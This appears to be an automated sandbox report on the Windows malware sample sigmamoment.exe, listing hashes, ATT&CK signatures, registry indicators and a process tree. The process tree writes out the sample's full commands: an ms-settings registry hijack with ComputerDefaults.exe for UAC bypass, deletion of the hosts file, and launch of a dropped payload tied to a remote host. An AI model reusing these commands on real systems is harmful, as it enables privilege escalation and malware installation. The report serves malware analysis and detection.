eccdf34958e260fc4ad375b0d53ed569cea6bef64f8ddecb7c060e4ab8a11c1f

Analysis

max time kernel
1799s
max time network
1161s
platform
windows10-2004_x64
resource
win10v2004-20240802-fr
resource tags

arch:x64arch:x86image:win10v2004-20240802-frlocale:fr-fros:windows10-2004-x64systemwindows
submitted
06/10/2024, 08:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sigmamoment.exe
Size

228KB
MD5

a93296ffcb3c92ab54eefce5949abcb3
SHA1

5858967f8c4a33f0210ecf98b0646de24448810b
SHA256

eccdf34958e260fc4ad375b0d53ed569cea6bef64f8ddecb7c060e4ab8a11c1f
SHA512

af6fa8333a19ec8ab21a1d78535d881f20499841c2df55695c388db2d0c791e9d3365d36be6c5bf5b906953fb71b88625a398047f74009dcd13730ba1f744ae5
SSDEEP

3072:cES7d6UUU7i1yXA2GjaXFdM5y34mwtcmn9OYntFr1DXf8nQxtjwKNQTX:cESVYmH35wKmnTtFFf8nQDjwKNw

Score

7^/10

defense_evasion discovery persistence privilege_escalation

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
4528	PwDxYIOvdRPkg9jcZILMX006.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 22 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\898748.vbs"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\530436.vbs"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\ms-settings\Shell\Open	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
3964	msedge.exe
3964	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
5040	msedge.exe
5040	msedge.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2496	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2496	taskmgr.exe
Token: SeSystemProfilePrivilege	2496	taskmgr.exe
Token: SeCreateGlobalPrivilege	2496	taskmgr.exe
Token: 33	5552	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5552	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
2496	taskmgr.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe
3772	msedge.exe

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe
5400	osk.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4284 wrote to memory of 4600	4284	sigmamoment.exe	85
PID 4284 wrote to memory of 4600	4284	sigmamoment.exe	85
PID 4600 wrote to memory of 4208	4600	cmd.exe	87
PID 4600 wrote to memory of 4208	4600	cmd.exe	87
PID 4284 wrote to memory of 4816	4284	sigmamoment.exe	88
PID 4284 wrote to memory of 4816	4284	sigmamoment.exe	88
PID 4816 wrote to memory of 4776	4816	cmd.exe	90
PID 4816 wrote to memory of 4776	4816	cmd.exe	90
PID 4816 wrote to memory of 1332	4816	cmd.exe	91
PID 4816 wrote to memory of 1332	4816	cmd.exe	91
PID 4284 wrote to memory of 2720	4284	sigmamoment.exe	92
PID 4284 wrote to memory of 2720	4284	sigmamoment.exe	92
PID 2720 wrote to memory of 2476	2720	cmd.exe	94
PID 2720 wrote to memory of 2476	2720	cmd.exe	94
PID 2476 wrote to memory of 4076	2476	ComputerDefaults.exe	95
PID 2476 wrote to memory of 4076	2476	ComputerDefaults.exe	95
PID 4076 wrote to memory of 4896	4076	wscript.exe	96
PID 4076 wrote to memory of 4896	4076	wscript.exe	96
PID 4284 wrote to memory of 4976	4284	sigmamoment.exe	98
PID 4284 wrote to memory of 4976	4284	sigmamoment.exe	98
PID 4284 wrote to memory of 4400	4284	sigmamoment.exe	101
PID 4284 wrote to memory of 4400	4284	sigmamoment.exe	101
PID 4400 wrote to memory of 1892	4400	cmd.exe	103
PID 4400 wrote to memory of 1892	4400	cmd.exe	103
PID 4284 wrote to memory of 1612	4284	sigmamoment.exe	108
PID 4284 wrote to memory of 1612	4284	sigmamoment.exe	108
PID 1612 wrote to memory of 4236	1612	cmd.exe	110
PID 1612 wrote to memory of 4236	1612	cmd.exe	110
PID 4284 wrote to memory of 244	4284	sigmamoment.exe	112
PID 4284 wrote to memory of 244	4284	sigmamoment.exe	112
PID 244 wrote to memory of 1876	244	cmd.exe	114
PID 244 wrote to memory of 1876	244	cmd.exe	114
PID 244 wrote to memory of 1084	244	cmd.exe	115
PID 244 wrote to memory of 1084	244	cmd.exe	115
PID 4284 wrote to memory of 4484	4284	sigmamoment.exe	116
PID 4284 wrote to memory of 4484	4284	sigmamoment.exe	116
PID 4484 wrote to memory of 3656	4484	cmd.exe	118
PID 4484 wrote to memory of 3656	4484	cmd.exe	118
PID 3656 wrote to memory of 4204	3656	ComputerDefaults.exe	119
PID 3656 wrote to memory of 4204	3656	ComputerDefaults.exe	119
PID 4204 wrote to memory of 3488	4204	wscript.exe	120
PID 4204 wrote to memory of 3488	4204	wscript.exe	120
PID 3488 wrote to memory of 4528	3488	cmd.exe	122
PID 3488 wrote to memory of 4528	3488	cmd.exe	122
PID 4284 wrote to memory of 3476	4284	sigmamoment.exe	123
PID 4284 wrote to memory of 3476	4284	sigmamoment.exe	123
PID 4284 wrote to memory of 4228	4284	sigmamoment.exe	125
PID 4284 wrote to memory of 4228	4284	sigmamoment.exe	125
PID 4228 wrote to memory of 3644	4228	cmd.exe	127
PID 4228 wrote to memory of 3644	4228	cmd.exe	127
PID 3772 wrote to memory of 3280	3772	msedge.exe	137
PID 3772 wrote to memory of 3280	3772	msedge.exe	137
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138
PID 3772 wrote to memory of 3460	3772	msedge.exe	138

C:\Users\Admin\AppData\Local\Temp\sigmamoment.exe
"C:\Users\Admin\AppData\Local\Temp\sigmamoment.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4284
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4600
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    PID:4208
- C:\Windows\system32\cmd.exe
  /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\898748.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\898748.vbs" /f
    3⤵
    - Modifies registry class
    PID:4776
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    - Modifies registry class
    PID:1332
- C:\Windows\system32\cmd.exe
  /c start /B ComputerDefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\system32\ComputerDefaults.exe
    ComputerDefaults.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" C:\Users\Admin\AppData\Local\Temp\898748.vbs
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:4896
- C:\Windows\system32\cmd.exe
  /c del /f C:\Users\Admin\AppData\Local\Temp\898748.vbs
  2⤵
  PID:4976
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Modifies registry class
    PID:1892
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1612
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    PID:4236
- C:\Windows\system32\cmd.exe
  /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\530436.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:244
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\530436.vbs" /f
    3⤵
    - Modifies registry class
    PID:1876
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    - Modifies registry class
    PID:1084
- C:\Windows\system32\cmd.exe
  /c start /B ComputerDefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4484
- - C:\Windows\system32\ComputerDefaults.exe
    ComputerDefaults.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" C:\Users\Admin\AppData\Local\Temp\530436.vbs
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4204
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\PwDxYIOvdRPkg9jcZILMX006.exe 3j74ryd080cinbj8ec8vyv3ofv6npy:PwDxYIOvdRPkg9jcZILMX006:matchashop.icu
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3488
      - C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\PwDxYIOvdRPkg9jcZILMX006.exe
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\PwDxYIOvdRPkg9jcZILMX006.exe 3j74ryd080cinbj8ec8vyv3ofv6npy:PwDxYIOvdRPkg9jcZILMX006:matchashop.icu
        6⤵
        Executes dropped EXE
        
        PID:4528
- C:\Windows\system32\cmd.exe
  /c del /f C:\Users\Admin\AppData\Local\Temp\530436.vbs
  2⤵
  PID:3476
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4228
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Modifies registry class
    PID:3644

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3980

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd633d46f8,0x7ffd633d4708,0x7ffd633d4718
  2⤵
  PID:3280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,9749726854183112183,1911539110753178073,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
  2⤵
  PID:3460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,9749726854183112183,1911539110753178073,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,9749726854183112183,1911539110753178073,131072 --lang=fr --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
  2⤵
  PID:2896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,9749726854183112183,1911539110753178073,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,9749726854183112183,1911539110753178073,131072 --lang=fr --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:2304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,9749726854183112183,1911539110753178073,131072 --lang=fr --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:1
  2⤵
  PID:4984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,9749726854183112183,1911539110753178073,131072 --lang=fr --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4292 /prefetch:1
  2⤵
  PID:2396

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2340

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault8d8eef04h14e1h4072h934chef912323abee
1⤵
PID:3248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd633d46f8,0x7ffd633d4708,0x7ffd633d4718
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,12219988726617797577,11873409937446935323,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
  2⤵
  PID:4732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,12219988726617797577,11873409937446935323,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,12219988726617797577,11873409937446935323,131072 --lang=fr --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8
  2⤵
  PID:5004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5204

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5256

C:\Windows\System32\ATBroker.exe
